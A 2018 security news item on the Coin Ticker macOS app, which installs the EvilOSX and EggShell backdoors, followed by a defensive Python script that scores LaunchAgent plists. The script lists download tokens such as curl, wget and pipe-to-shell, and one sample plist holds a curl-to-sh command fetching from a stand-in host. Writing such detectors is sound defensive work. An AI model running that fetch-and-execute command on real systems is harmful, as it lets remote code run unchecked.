Delaware, USA – October 30, 2018 — Researchers have discovered a macOS application that monitors cryptocurrency rates and installs the EvilOSX and EggShell backdoors on the system. It is not known for certain whether attackers compromised the Coin Ticker app or whether the application was built for malicious purposes from the start. The latter is more likely, as the website contains no information about the authors and was registered only a few months ago. When launched, the application downloads shell and Python scripts from the attackers’ server; these in turn fetch EggShell and EvilOSX from their GitHub repositories and install them on the victim’s system. The malware also creates launch agents so that the backdoors run automatically at startup. Notably, the attackers do not need elevated privileges to infect and control the attacked system.
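The per-user launch agents described above are the persistence artifact a defender can hunt for without any special tooling: they live in the victim's own home directory (which is why no elevated privileges are needed) and are plain plist files. The following script is an added example, not code from the report, from SOC Prime, or from the malware authors. It triages LaunchAgent plists with a few heuristics that match the behaviour the report describes (a script interpreter as entry point, execution from a temporary or hidden directory, an inline shell command with a download primitive, an Apple-style label in a user directory). The sample plists, labels and paths it builds are constructed for the demonstration and are not indicators from the Coin Ticker case.

```python
# Added example: heuristic triage of per-user LaunchAgent plists on macOS.
# Not code from the report or from SOC Prime; all labels and paths are constructed.
import os
import plistlib
import re
import tempfile
from pathlib import Path

# Interpreters commonly used as the entry point of a staged script backdoor.
SCRIPT_INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "zsh", "osascript"}
# User-writable staging locations a legitimate vendor agent rarely runs from.
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
# Tokens that indicate an inline command fetches or decodes a second stage.
DOWNLOAD_TOKENS = ("curl ", "wget ", "base64 ", "| sh", "| bash", "| python")


def triage_launch_agent(plist_bytes: bytes) -> dict:
    """Score one launchd plist. Returns {'label', 'score', 'reasons'}."""
    try:
        data = plistlib.loads(plist_bytes)
    except Exception as exc:  # malformed XML or binary plist: worth a look by itself
        return {"label": None, "score": 1, "reasons": [f"unparseable plist: {exc}"]}
    label = data.get("Label")
    args = [str(a) for a in data.get("ProgramArguments", [])]
    if isinstance(data.get("Program"), str):  # 'Program' is an alternative to ProgramArguments[0]
        args = [data["Program"]] + args
    cmdline = " ".join(args)
    reasons = []
    if args and os.path.basename(args[0]) in SCRIPT_INTERPRETERS:
        reasons.append(f"entry point is a script interpreter ({os.path.basename(args[0])})")
    if any(d in cmdline for d in STAGING_DIRS):
        reasons.append("executes from a temporary or shared staging directory")
    if re.search(r"/\.[^/\s]+/", cmdline):
        reasons.append("path contains a hidden (dot-prefixed) directory")
    if "-c" in args[1:] and any(t in cmdline for t in DOWNLOAD_TOKENS):
        reasons.append("inline -c command with a download/decode primitive")
    if isinstance(label, str) and label.startswith("com.apple."):
        # Apple's own agents live under /System/Library/LaunchAgents, never in ~/Library/LaunchAgents.
        reasons.append("Apple-style label in a per-user agent")
    return {"label": label, "score": len(reasons), "reasons": reasons}


def scan_launch_agents(directory, threshold: int = 2) -> list:
    """Triage every .plist in `directory`; return (path, result) pairs at or above `threshold`."""
    flagged = []
    for path in sorted(Path(directory).glob("*.plist")):
        result = triage_launch_agent(path.read_bytes())
        if result["score"] >= threshold:
            flagged.append((str(path), result))
    return sorted(flagged, key=lambda item: -item[1]["score"])


# Constructed sample agents (hypothetical labels and paths, not real indicators).
SAMPLE_AGENTS = {
    "benign": {
        "Label": "com.example.updater",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--background"],
        "RunAtLoad": True,
    },
    "downloader": {
        "Label": "com.apple.softwareupdate.helper",
        "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://stage.example.invalid/s.sh | sh"],
        "RunAtLoad": True,
    },
    "stager": {
        "Label": "com.coinsvc.agent",
        "ProgramArguments": ["/usr/bin/python", "/tmp/.coinsvc/agent.py"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
}
SAMPLE_PLISTS = {name: plistlib.dumps(agent) for name, agent in SAMPLE_AGENTS.items()}


def demo() -> list:
    """Write the samples to a scratch LaunchAgents directory, scan it, return (label, score) pairs."""
    with tempfile.TemporaryDirectory() as scratch:
        for name, blob in SAMPLE_PLISTS.items():
            Path(scratch, f"{name}.plist").write_bytes(blob)
        flagged = scan_launch_agents(scratch)
    return [(result["label"], result["score"]) for _, result in flagged]


if __name__ == "__main__":
    for label, score in demo():
        print(f"{score}  {label}")
    # On a real host: scan_launch_agents(Path.home() / "Library" / "LaunchAgents")
```

The heuristics are deliberately coarse: a developer's own `~/Library/LaunchAgents` entry that runs a Python script will score at least one point, so the threshold is set so that a single indicator is only logged, not alerted on. The point is to turn the report's description of persistence into something a responder can run across a fleet and feed into the kill-chain correlation the rule pack mentioned below performs.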
How the attackers distribute this application, and who is behind the campaign, is not yet known. At the end of the summer the Lazarus group carried out a similar attack on a cryptocurrency exchange using the Celas Trade Pro application, which installed the Fallchill malware. Coin Ticker is a far less sophisticated scheme, but it still poses a serious threat to cryptocurrency-related organizations, because many macOS users assume their platform is inherently secure. Backdoor activity in an organization’s network can be detected with the APT Framework rule pack, which surfaces internal hosts or targets that have triggered events matching several different kill chain stages and includes resources for whitelisting: https://my.socprime.com/en/integrations/apt-framework-hpe-arcsight